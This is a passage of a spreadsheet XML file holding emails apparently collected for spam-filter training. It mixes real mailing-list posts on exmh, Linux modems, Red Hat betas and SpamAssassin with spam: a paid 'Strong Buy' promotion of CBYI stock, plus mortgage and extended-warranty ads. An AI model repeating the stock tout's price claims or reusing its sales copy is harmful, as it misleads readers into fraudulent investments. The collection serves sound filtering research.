   If you wish to unsubscribe from this list, please &lt;A HREF=3D"http://213.=
 139.76.100/PHP/remove.php"&gt;Click 
   here&lt;/A&gt; and enter your name into the remove box. &lt;/FONT&gt;&lt;FONT  COLOR=3D=
 "#000000" BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D3 PT=
 SIZE=3D12 FAMILY=3D"SANSSERIF" FACE=3D"Verdana" LANG=3D"0"&gt;	
   &lt;BR&gt;
 	&lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;/font&gt;&lt;/P&gt;&lt;FONT  COLOR=3D"#000000" BACK=3D"#ffffff" style=3D"BACKGROUND-C=
 OLOR: #ffffff" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"SANSSERIF" FACE=3D"Verdana" =
 LANG=3D"0"&gt;&lt;p&gt;&lt;/P&gt;&lt;/FONT&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt;&gt; I run exmh on my desktops at home and at work with the resulting exmh
 &gt;&gt; windows being displayed on both my work and home desktops (gratis SSH
 &gt;&gt; X11 forwarding).  In fact, your message was read and replied to (this
 &gt;&gt; message) while at work, using an exmh instance running on my home
 &gt;&gt; machine.
 Just to throw in another approach to solving the same problem. 
 I run two copies of exmh, one at work, one at home.  They both
 display on a "virtual X server" created by vncserver on the home
 box.  I connect to that virtual X server using vncviewer wherever
 I happen to be.  The VNC connection is tunneled over ssh and is
 carried over the Internet via an IPSEC appliance.
 That gives me access to both home and work email from either 
 place without the complications involved in having two copies of 
 exmh working on the same set of folders.
 It's a tad slow viewing work email when I'm at work ... but not 
 so bad that I can't stand it.
 --Hal
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Drug halves genital herpes transmission
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8397801,1440/
 Date: Not supplied
 The antiviral drug significantly reduces the spread of the incurable infection 
 through sex
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] modem problems
</t>
  </si>
  <si>
    <t xml:space="preserve">Quoting Waider (waider@waider.ie):
 &gt; Niall Sheridan wrote:
 &gt; | A power cycle will do it.
 &gt; | Other than that it's chipset specific.
 &gt; 
 &gt; sure. tried powercycling an internal modem recently? :)
 &gt; 
 &gt; Waider. This is Rick Moen bait.
 Thanks.  It was delicious.  ;-&gt;
 -- 
 Cheers,               "That article and its poster have been cancelled." 
 Rick Moen                   -- David B. O'Donnel, sysadmin for America Online
 rick@linuxmafia.com
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Limbo beta 2 ?
</t>
  </si>
  <si>
    <t xml:space="preserve">Michel Alexandre Salim (salimma1@yahoo.co.uk) wrote*:
 &gt;Haven't installed Limbo beta2 myself - been sidetracked by work; the
 Limbo beta2 ? I'm running Limbo 7.3.92 with kernel 4.2.18-5.58, is what I am running
 an "older" version of the Limbo beta, it is it "the" limbo beta?
 btw, it does have that gconf editor included.
 I dumped the RPMS from the Limbo cd's 1 to 3 onto a drive, ran a few scripts, edited
 sources.list (rpm file:///path-to-files/RPMS.os os [I think]) and used "apt-get
 dist-upgrade", worked like a charm. The real RH installer couldnot handle an upgrade
 for me, it froze "searching for packages".
 --
 That's "angle" as in geometry.
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: -&gt; IN THE NEWS TODAY &lt;----
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;&lt;/TITLE&gt;&lt;META http-equiv=3D=22Content-Type=22 content=3D=22=
 text/html; charset=3Dwindows-1252=22&gt;&lt;STYLE&gt;A:link =7BTEX-DECORATION: none=7D=
 A:active =7BTEXT-DECORATION: none=7DA:visited =7BTEXT-DECORATION: none=7DA:h=
 over =7BCOLOR: =230033ff; TEXT-DECORATION: underline=7D&lt;/STYLE&gt;&lt;META conten=
 t=3D=22MSHTML 6.00.2713.1100=22 name=3D=22GENERATOR=22&gt;&lt;/HEAD&gt;
 &lt;BODY text=3D=22=23000000=22 vLink=3D=22=230033ff=22 link=3D=22=230033ff=22 bgColor=
 =3D=22=23CCCC99=22&gt;&lt;TABLE borderColor=3D=22=23660000=22 cellSpacing=3D=220=22 cellP=
 adding=3D=220=22 border=3D=220=22 width=3D=22100%=22&gt;&lt;TR&gt;&lt;TD bgColor=3D=22=23CCCC99=22=
  valign=3D=22top=22 colspan=3D=222=22 height=3D=2227=22&gt;
 &lt;font size=3D=226=22 face=3D=22Arial, Helvetica, sans-serif=22 color=3D=22=23660=
 000=22&gt;
 &lt;b&gt;OTC&lt;/b&gt;&lt;/font&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD height=3D=222=22 bgcolor=3D=22=236a694f=22&gt;=
 &lt;font size=3D=225=22 face=3D=22Times New Roman, Times, serif=22 color=3D=22=23FF=
 FFFF=22&gt;
 &lt;b&gt;&amp;nbsp;Newsletter&lt;/b&gt;&lt;/font&gt;&lt;/TD&gt;&lt;TD height=3D=222=22 bgcolor=3D=22=236a694=
 f=22&gt;&lt;div align=3D=22right=22&gt;&lt;font color=3D=22=23FFFFFF=22&gt;
 &lt;b&gt;Discover Tomorrow's Winners&amp;nbsp;&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD =
 height=3D=2225=22 colspan=3D=222=22 bgcolor=3D=22=23CCCC99=22&gt;&lt;table width=3D=22100%=
 =22 border=3D=220=22 cellspacing=3D=220=22 cellpadding=3D=225=22&gt;&lt;tr&gt;&lt;td valign=3D=22=
 middle=22 height=3D=222=22&gt;&lt;table width=3D=22300=22 border=3D=221=22 cellspacing=3D=
 =220=22 cellpadding=3D=220=22 bordercolor=3D=22=23660000=22 bgcolor=3D=22=23EBEDCB=22=
  height=3D=225=22 align=3D=22center=22&gt;&lt;tr&gt;&lt;td valign=3D=22middle=22 height=3D=228=22=
 &gt;&lt;div align=3D=22center=22&gt;
 &lt;font face=3D=22Arial, Helvetica, sans-serif=22 color=3D=22=23660000=22 size=3D=
 =225=22&gt;
 &lt;b&gt;For Immediate Release&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;t=
 r&gt;&lt;td&gt;&lt;table width=3D=22100%=22 border=3D=221=22 cellspacing=3D=220=22 cellpaddin=
 g=3D=228=22 align=3D=22center=22 bgcolor=3D=22=23fafaf5=22 bordercolor=3D=22=23660000=
 =22&gt;&lt;tr&gt;&lt;td bgcolor=3D=22=23fafaf5=22 valign=3D=22top=22 height=3D=22453=22&gt;
 &lt;p&gt;&lt;font face=3D=22Verdana, Arial, Helvetica, sans-serif=22 size=3D=22-1=22&gt;
 &lt;b&gt;Cal-Bay (Stock Symbol: CBYI)&lt;/b&gt;
 &lt;br&gt;Watch for analyst =22Strong Buy Recommendations=22 and several adviso=
 ry newsletters picking CBYI.  CBYI has filed to be traded on the OTCBB, =
 share prices historically INCREASE when companies get listed on this lar=
 ger trading exchange. CBYI is trading around 25 cents and should skyrock=
 et to =242.66 - =243.25 a share in the near future.&lt;br&gt;
 &lt;b&gt;&lt;i&gt;Put CBYI on your watch list, acquire a position TODAY.&lt;/i&gt;&lt;/b&gt;&lt;/f=
 ont&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face=3D=22Verdana, Arial, Helvetica, sans-serif=22 size=3D=22-1=22&gt;
 &lt;b&gt;REASONS TO INVEST IN CBYI&lt;/b&gt;&lt;/font&gt;
 &lt;li&gt;&lt;font face=3D=22Verdana, Arial, Helvetica, sans-serif=22 size=3D=22-1=22&gt;=
 A profitable company and is on track to beat ALL earnings estimates=21&lt;/=
 font&gt;
 &lt;li&gt;&lt;font face=3D=22Verdana, Arial, Helvetica, sans-serif=22 size=3D=22-1=22&gt;=
 One of the FASTEST growing distributors in environmental &amp;amp; safety e=
 quipment instruments.&lt;/font&gt;
 &lt;li&gt;&lt;font face=3D=22Verdana, Arial, Helvetica, sans-serif=22 color=3D=22=2300=
 0000=22 size=3D=22-1=22&gt;
 Excellent management team, several EXCLUSIVE contracts.  IMPRESSIVE cli=
 ent list including the U.S. Air Force, Anheuser-Busch, Chevron Refining =
 and Mitsubishi Heavy Industries, GE-Energy &amp;amp; Environmental Research.=
 &lt;/font&gt;
 &lt;p&gt;&lt;font face=3D=22Verdana, Arial, Helvetica, sans-serif=22 size=3D=22-1=22&gt;
 &lt;b&gt;RAPIDLY GROWING INDUSTRY&lt;/b&gt;
 &lt;br&gt;Industry revenues exceed =24900 million, estimates indicate that the=
 re could be as much as =2425 billion from =22smell technology=22 by the end=
  of 2003.&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face=3D=22Verdana, Arial, Helvetica, sans-serif=22 size=3D=22-1=22&gt;
 &lt;b&gt;=21=21=21=21=21CONGRATULATIONS=21=21=21=21=21&lt;/b&gt;&lt;br&gt;Our last recommendation t=
 o buy ORBT at =241.29 rallied and is holding steady at =243.50=21 Congratul=
 ations to all our subscribers that took advantage of this recommendation=
 .&lt;/font&gt;&lt;/p&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;
 &lt;p align=3D=22center=22&gt;&lt;font size=3D=22-1=22 face=3D=22Verdana, Arial, Helveti=
 ca, sans-serif=22 color=3D=22=23660000=22&gt;
 ALL removes HONORED. Please allow 7 days to be removed and send ALL add=
 resses to:
 &lt;font color=3D=23ff0000&gt;
 &lt;a href=3D=22mailto:goneforgood=40btamail.net.cn=22&gt;GoneForGood=40btamail.ne=
 t.cn
 &lt;/a&gt;&lt;/font&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;table width=3D=22100%=22 border=3D=221=22 c=
 ellspacing=3D=220=22 cellpadding=3D=220=22 bordercolor=3D=22=23660000=22&gt;&lt;tr&gt;&lt;td b=
 gcolor=3D=22=23660000=22 height=3D=228=22&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td bgcolor=3D=22=23=
 FFFFCC=22&gt;&lt;table width=3D=22100%=22 border=3D=220=22 cellspacing=3D=220=22 cellpad=
 ding=3D=224=22&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font size=3D=22-2=22 face=3D=22Verdana, Arial, Helvetica, sans-serif=22&gt;
 Certain statements contained in this news release may be forward-lookin=
 g statements within the meaning of The Private Securities Litigation Ref=
 orm Act of 1995. These statements may be identified by such terms as =22e=
 xpect=22, =22believe=22, =22may=22, =22will=22, and =22intend=22 or similar terms=
 . We are NOT a registered investment advisor or a broker dealer. This is=
  NOT an offer to buy or sell securities. No recommendation that the secu=
 rities of the companies profiled should be purchased, sold or held by in=
 dividuals or entities that learn of the profiled companies. We were paid=
  =2427,000 in cash by a third party to publish this report. Investing in =
 companies profiled is high-risk and use of this information is for readi=
 ng purposes only. If anyone decides to act as an investor, then it will =
 be that investor's sole risk. Investors are advised NOT to invest withou=
 t the proper advisement from an attorney or a registered financial broke=
 r. Do not rely solely on the information presented, do additional indepe=
 ndent research to form your own opinion and decision regarding investing=
  in the profiled companies. Be advised that the purchase of such high-ri=
 sk securities may result in the loss of your entire investment.  Not int=
 ended for recipients or residents of CA,CO,CT,DE,ID, IL,IA,LA,MO,NV,NC,O=
 K,OH,PA,RI,TN,VA,WA,WV,WI. Void where prohibited.  The owners of this pu=
 blication may already own free trading shares in CBYI and may immediatel=
 y sell all or a portion of these shares into the open market at or about=
  the time this report is published.  Factual statements are made as of t=
 he date stated and are subject to change without notice.
 &lt;br&gt;Copyright c 2001&lt;/font&gt;&lt;hr width=3D=22100%=22 noShade size=3D=221=22&gt;&lt;/td=
 &gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD cols=
 pan=3D=222=22 height=3D=2231=22&gt;&lt;table width=3D=22100%=22 border=3D=220=22 cellspaci=
 ng=3D=220=22 cellpadding=3D=224=22&gt;&lt;tr&gt;&lt;td width=3D=2287%=22 height=3D=2221=22&gt;&lt;div =
 align=3D=22right=22&gt;
 &lt;font color=3D=22=23666666=22&gt;&amp;equiv;&lt;/font&gt;&lt;/div&gt;&lt;/td&gt;&lt;td width=3D=227%=22 he=
 ight=3D=2221=22&gt;
 &lt;font face=3D=22Arial, Helvetica, sans-serif=22 size=3D=226=22 color=3D=22=23FFF=
 FFF=22&gt;
 OTC&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;td width=3D=226%=22 height=3D=2221=22&gt;&lt;div align=3D=22le=
 ft=22&gt;
 &lt;font color=3D=22=23666666=22&gt;&amp;equiv;&lt;/font&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/TD&gt;&lt;/=
 TR&gt;&lt;/TABLE&gt;&lt;/BODY&gt;&lt;/HTML&gt;
 ****
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Great Idea for You byrdshot
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;P ALIGN=CENTER&gt;&lt;FONT  SIZE=5 PTSIZE=18 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;&lt;B&gt;Mortgage Rates Are About To Rise&lt;/FONT&gt;&lt;FONT  COLOR="#000000" BACK="#ffffff" style="BACKGROUND-COLOR: #ffffff" SIZE=2 PTSIZE=10 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;&lt;/B&gt;&lt;BR&gt;
 &lt;/FONT&gt;&lt;FONT  COLOR="#000000" BACK="#ffffff" style="BACKGROUND-COLOR: #ffffff" SIZE=5 PTSIZE=18 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;&lt;B&gt;Cash In Now!&lt;/FONT&gt;&lt;FONT  COLOR="#000000" BACK="#ffffff" style="BACKGROUND-COLOR: #ffffff" SIZE=2 PTSIZE=10 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;&lt;/B&gt;&lt;BR&gt;
 &lt;P ALIGN=LEFT&gt;&lt;BR&gt;
 &lt;P ALIGN=CENTER&gt;&lt;/FONT&gt;&lt;FONT  COLOR="#000000" BACK="#ffffff" style="BACKGROUND-COLOR: #ffffff" SIZE=4 PTSIZE=14 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;Our programs will help you with:&lt;/FONT&gt;&lt;FONT  COLOR="#000000" BACK="#ffffff" style="BACKGROUND-COLOR: #ffffff" SIZE=2 PTSIZE=10 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;&lt;BR&gt;
 &lt;P ALIGN=LEFT&gt;&lt;BR&gt;
 &lt;P ALIGN=CENTER&gt;&lt;/FONT&gt;&lt;FONT  COLOR="#000000" BACK="#ffffff" style="BACKGROUND-COLOR: #ffffff" SIZE=3 PTSIZE=12 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;-Debt Consolidation&lt;BR&gt;
 &lt;BR&gt;
 -2nd Mortgage&lt;BR&gt;
 &lt;BR&gt;
 -Refianance&lt;BR&gt;
 &lt;BR&gt;
 -Home Improvement&lt;/FONT&gt;&lt;FONT  COLOR="#000000" BACK="#ffffff" style="BACKGROUND-COLOR: #ffffff" SIZE=2 PTSIZE=10 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;&lt;BR&gt;
 &lt;P ALIGN=LEFT&gt;&lt;BR&gt;
 &lt;P ALIGN=CENTER&gt;&lt;/FONT&gt;&lt;FONT  COLOR="#000000" BACK="#ffffff" style="BACKGROUND-COLOR: #ffffff" SIZE=4 PTSIZE=14 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;Our free no obligation quite has already helped &lt;BR&gt;
 thousands of homeowners, just like you.&lt;/FONT&gt;&lt;FONT  COLOR="#000000" BACK="#ffffff" style="BACKGROUND-COLOR: #ffffff" SIZE=2 PTSIZE=10 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;&lt;BR&gt;
 &lt;P ALIGN=LEFT&gt;&lt;BR&gt;
 &lt;BR&gt;
 &lt;P ALIGN=CENTER&gt;&lt;/FONT&gt;&lt;FONT  COLOR="#0000ff" BACK="#ffffff" style="BACKGROUND-COLOR: #ffffff" SIZE=5 PTSIZE=18 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;&lt;A HREF="http://www.mortgageloanfreequotes.com"&gt;Click Here to start saving&lt;/A&gt;&lt;/FONT&gt;&lt;FONT  COLOR="#000000" BACK="#ffffff" style="BACKGROUND-COLOR: #ffffff" SIZE=2 PTSIZE=10 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;&lt;BR&gt;
 &lt;P ALIGN=LEFT&gt;&lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;P ALIGN=CENTER&gt;If you would rather not be included in our future mailings, click &lt;A HREF="mailto:halberry4@yahoo.com"&gt;here&lt;/A&gt;.&lt;/P&gt;&lt;/P&gt;&lt;/P&gt;&lt;/P&gt;&lt;/P&gt;&lt;/P&gt;&lt;/P&gt;&lt;/P&gt;&lt;/P&gt;&lt;/P&gt;&lt;/P&gt;&lt;/FONT&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Maybe it's just me ...
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "T" == ThosStew  &lt;ThosStew@aol.com&gt; writes:
     T&gt; ... The Mormon church has a fabulous MIS system, and since it's
     T&gt; built on geneological tracking
 If that's what you would like to believe, go right ahead.
     T&gt; I assume you weren't suggesting that a person's religion
     T&gt; (assuming the Mormon's ex-CIO was Mormon) should be an
     T&gt; issue. 
 No, not at all.  I was only concerned where the border between religion 
 and cult gets real fuzzy, and where the r/c in question has known
 paranoiac tendencies.  
 Then again, maybe you're right, it's a very close match in job
 descriptions.  Obviously it does not concern anyone else, and since
 it's none of my business, I'll shut up about it and put it down to
 more funky fun in US politics.
 Afterall, all I know for certain about the Mormons is the background
 and fallout on my ex-wife's excommunication ;)
 -- 
 Gary Lawrence Murphy &lt;garym@teledyn.com&gt; TeleDynamics Communications Inc
 Business Innovations Through Open Source Systems: http://www.teledyn.com
 "Computers are useless.  They can only give you answers."(Pablo Picasso)
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [zzzzteana] Emigrate to Russia? That's a steppe too far
</t>
  </si>
  <si>
    <t xml:space="preserve">The Electronic Telegraph
  Emigrate to Russia? That's a steppe too far
  (Filed: 28/08/2002) 
  So you think you've got it bad: fed up with Folkestone, bored with Birmingham
  or sick of Sheffield.
  Those 54 per cent of Britons - according to a Daily Telegraph/YouGov survey
  this week - who dream of a stress-free life in sunnier climes should perhaps
  heed a word of friendly advice on the realities of living abroad.
  Kommersant, a Russian daily newspaper, yesterday offered those dissatisfied
  with life in Blair's Britain a taste of what to expect should they choose to
  emigrate to provincial Russia.
  After reading about the gripes of affluent Britons, its tongue-in-cheek
  article admitted, however, that the grass was not always greener on the other
  side.
  "The inhabitants of foggy Albion keen to travel could go to any Russian city
  deep in the provinces where things are quiet," said Kommersant.
  "In any central Russian district, life, by British standards, is unseemingly
  cheap and remarkably laid back. By 11am most of the working population are
  becoming 'traditionally' relaxed."
  The time for elevenses in Britain - perhaps the opportunity for a quiet cup of
  tea and a chocolate Hobnob - is known in Russia as the Wolf Hour.
  It was so named in Soviet times because at 11am a wolf appeared from the
  famous animal clock at the Obrasov Puppet Theatre in Moscow. It is also
  opening time in the nation's vodka shops.
  And the vodka, like all other spirits, is cheap. Kommersant pointed out that
  "the money a Briton can earn from selling even the most shabby house would be
  enough to support them at the local standard of living for the rest of their
  life.
  "The local shops are full of all they would need and they could buy a bottle
  of whisky for kopecks."
  There are 100 kopecks in a ruble and the ruble is currently worth about a
  halfpenny in sterling.
  The whisky is cheap, however, because it is unlike anything the average Briton
  will have consumed before. It is made of samagon - home-distilled, moonshine
  vodka - coloured with tea, and is a popular beverage in rural areas and among
  diehard alcoholics.
  While alcohol is plentiful and cheap, food may not be so easy to come by. The
  newspaper pointed out that traditional British foodstuffs - it selected oxtail
  soup as an example - were in short supply. However, the wealth of the British
  settler should overcome the difficulty.
  "For a modest reward in most Russian villages, the locals would happily cut
  off the tails from the entire collective farm's herd of cattle."
  One or two potential emigrs might be deterred by language difficulties. There
  are few English speakers to be found among the green hills of Tula on the
  Mongolian border.
  However, Kommersant pointed out, language difficulties were not considered a
  deterrent by the 13 per cent of Britons who nominated France as the country in
  which they would like to live.
  France, the Russian paper claimed, was a country "where English is only known
  by the beggars, Belorussian prostitutes and Russian tourists".
  Despite the low cost of living and the easy-going lifestyle, the Russian
  weather remains a major stumbling block for Britons.
  Even in the most temperate regions, winter temperatures of -20C are common.
  And somewhere like the Sakha Republic - east of Siberia and the coldest place
  in the world - enjoys just one month of summer and endures winter temperatures
  that drop below -70C. Houses are built on concrete stilts because the
  permafrost makes digging foundations impossible.
  Again, the Russian paper had a word of reassurance. While acknowledging the
  climatic problems, it said that "thanks to global warming this difficulty will
  solve itself".
  Kommersant also had an answer to the labour crisis that would be created in
  Britain if 54 per cent of its citizens decided to opt for a life in Russia.
  "Thirty-three million Russians could be sent to Britain to replace the 33
  million who leave. We think that the required number could probably be found
  amongst our citizens."
  Unfortunately for those 33 million Russians, however, not one of those Britons
  surveyed who wanted to move abroad nominated the Russian steppes as their
  preferred new home.
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 4 DVDs Free +s&amp;p Join Now
 http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SAtalk] spamc and DCC
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_0056_01C25F11.18554780
 Content-Type: text/plain;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 Hi -=20
 I upgraded to 2.40 (now 2.41) last week and the messages which are =
 definitely in the DCC database aren't being marked as such by =
 spamassassin when connected to via spamc. Interestingly it is detected =
 when running spamassassin -t &lt; sample-spam.txt (using the same userid =
 incidentally). Is this a known "feature" of spamc under 2.4x or is there =
 anything obvious that I am not implementing correctly? Note that as I =
 implied above this used to work under 2.3x of spamassassin and =
 spamd/spamc
 Regards
 Ray Gardener
 Sheffield Hallam University
 UK
 ------=_NextPart_000_0056_01C25F11.18554780
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;&lt;HEAD&gt;
 &lt;META http-equiv=3DContent-Type content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;META content=3D"MSHTML 6.00.2719.2200" name=3DGENERATOR&gt;
 &lt;STYLE&gt;&lt;/STYLE&gt;
 &lt;/HEAD&gt;
 &lt;BODY bgColor=3D#ffffff&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;Hi - &lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;I&amp;nbsp;upgraded to 2.40 (now 2.41) last =
 week and=20
 the messages which are definitely in the DCC database&amp;nbsp;aren't being =
 marked=20
 as such by spamassassin when connected to via spamc. Interestingly it is =
 detected when running spamassassin -t &amp;lt; sample-spam.txt (using the =
 same=20
 userid incidentally). Is this a known "feature" of spamc under 2.4x or =
 is there=20
 anything obvious that I am not implementing correctly? Note that as I =
 implied=20
 above this used to work under 2.3x of spamassassin and =
 spamd/spamc&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;Regards&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;Ray Gardener&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;Sheffield Hallam =
 University&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;UK&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;&lt;/BODY&gt;&lt;/HTML&gt;
 ------=_NextPart_000_0056_01C25F11.18554780--
 -------------------------------------------------------
 This SF.NET email is sponsored by: AMD - Your access to the experts
 on Hammer Technology! Open Source &amp; Linux Developers, register now
 for the AMD Developer Symposium. Code: EX8664
 http://www.developwithamd.com/developerlab
 _______________________________________________
 Spamassassin-talk mailing list
 Spamassassin-talk@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/spamassassin-talk
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: why does your vehicle make that noise?                AAK
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;HEAD&gt;&lt;/HEAD&gt;&lt;BODY&gt;&lt;center&gt;&lt;FONT SIZE=3D4 COLOR=3D#FF3300&gt;&lt;B&gt;Protect =
 your financial well-being.&lt;BR&gt;Purchase an Extended Auto Warranty for your =
 Vehicle TODAY.&lt;/B&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;FONT FACE=3DArial SIZE=3D4 COLOR=3D#=
 CC0000&gt;&lt;B&gt;&lt;U&gt;&lt;A HREF=3Dhttp://www.qz932.com/auto/&gt;Click Here for your free=
 , Fast, no BS Rates NOW!!&lt;/A&gt;&lt;/U&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;br&gt;&lt;FONT&gt;&lt;B&gt;&lt;/center&gt;Car =
 troubles and expensive repair bills always seem to happen at the worst pos=
 sible time Dont they?. Protect yourself and your family with an Extended&lt;b=
 r&gt;Warranty for your car, truck, or SUV, so that a large expense cannot hit=
  you all at once. We cover most vehicles with less than 150,000 miles.&lt;/B&gt;=
 &lt;/FONT&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;FONT SIZE=3D4 COLOR=3D#FF3333&gt;&lt;B&gt;&lt;I&gt;Our warranties are=
  the same as the dealer offers but instead&lt;BR&gt;you are purchasing them dire=
 ct!!!&lt;/I&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;FONT SIZE=3D3&gt;&lt;B&gt;&lt;I&gt;We offer fair prices =
 and prompt, toll-free claims service. Get an Extended Warranty on your veh=
 icle today.&lt;/I&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;br&gt;&lt;br&gt;&lt;A HREF=3Dhttp://www.qz932.com/auto/&gt;Cli=
 ck here today and we will include at no extra cost:&lt;/A&gt;&lt;br&gt;&lt;Br&gt;&lt;UL TYPE=3D=
 CIRCLE&gt;&lt;BR&gt;&lt;LI&gt;24-Hour Roadside Assistance.&lt;LI&gt;Car Rental Benefits.&lt;LI&gt;Tri=
 p Interruption Benefits.&lt;LI&gt;Extended Towing Benefits.&lt;/UL&gt;&lt;A HREF=3Dhttp:/=
 /www.qz932.com/auto/&gt;Click Here for your free, Fast, no BS Rates NOW!!&lt;/A&gt;=
 &lt;br&gt;&lt;br&gt;Save now, don't wait until it is TOO LATE!&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;=
 &lt;FONT SIZE=3D1 COLOR=3D#FFFF99&gt;We search for the best offering's for&lt;br&gt;yo=
 u; we do the research and you get only The superior results&lt;br&gt;this email =
 is brought to you by; KBR . To abnegate&lt;br&gt;all future notices, &lt;FONT COLOR=
 =3D#FFFF66&gt;&lt;A HREF=3Dhttp://www.qz932.com/index2.html&gt;Enter here&lt;/A&gt;&lt;/FONT=
 &gt;&lt;/FONT&gt;&lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Spam Alert Issue
</t>
  </si>
  <si>
    <t xml:space="preserve">------=_NextPart_000_001D_53B46E59.C27024C0
 Content-Type: text/html
 Content-Transfer-Encoding: base64
 PGh0bWwgeG1sbnM6bz0idXJuOnNjaGVtYXMtbWljcm9zb2Z0LWNvbTpvZmZpY2U6b2ZmaWNl
